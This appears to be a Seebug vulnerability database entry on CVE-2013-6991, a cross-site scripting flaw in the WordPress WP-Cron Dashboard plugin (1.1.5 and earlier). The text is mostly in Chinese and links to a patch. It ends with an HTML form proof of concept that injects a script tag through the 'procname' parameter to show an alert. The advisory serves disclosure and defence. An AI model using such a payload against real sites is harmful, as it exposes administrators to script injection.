Lucene search

K
seebugRootSSV:61227
HistoryDec 27, 2013 - 12:00 a.m.

Wordpress WP-Cron Dashboard插件跨站脚本漏洞

2013-12-2700:00:00
Root
www.seebug.org
17

0.002 Low

EPSS

Percentile

60.5%

CVE ID:CVE-2013-6991

WordPress是一款内容管理系统。

由于"procname" HTTP POST参数传递到"/wp-admin/tools.php"脚本的参数未能充分过滤用户提供的数据, 远程攻击者可以欺骗登录的管理员访问恶意链接,在受影响网站的浏览器上下文中执行任意HTML和脚本代码。
0
Wordpress WP-Cron Dashboard<=1.1.5
厂商未提供官方的更新补丁,用户可使用非官方补丁:

https://www.htbridge.com/advisory/HTB23189-patch.zip


                                                The exploitation example below uses the &quot;alert()&quot; JavaScript function to display &quot;immuniweb&quot; word:

&lt;form action=&quot;http://[host]/wp-admin/tools.php?page=wp-cron-dashboard&quot; method=&quot;post&quot; name=&quot;main&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;procname&quot;  value='&lt;script&gt;alert(&quot;immuniweb&quot;);&lt;/script&gt;'&gt;
&lt;input type=&quot;hidden&quot; name=&quot;submit&quot;  value='1'&gt;
&lt;input type=&quot;submit&quot; id=&quot;btn&quot;&gt;
&lt;/form&gt;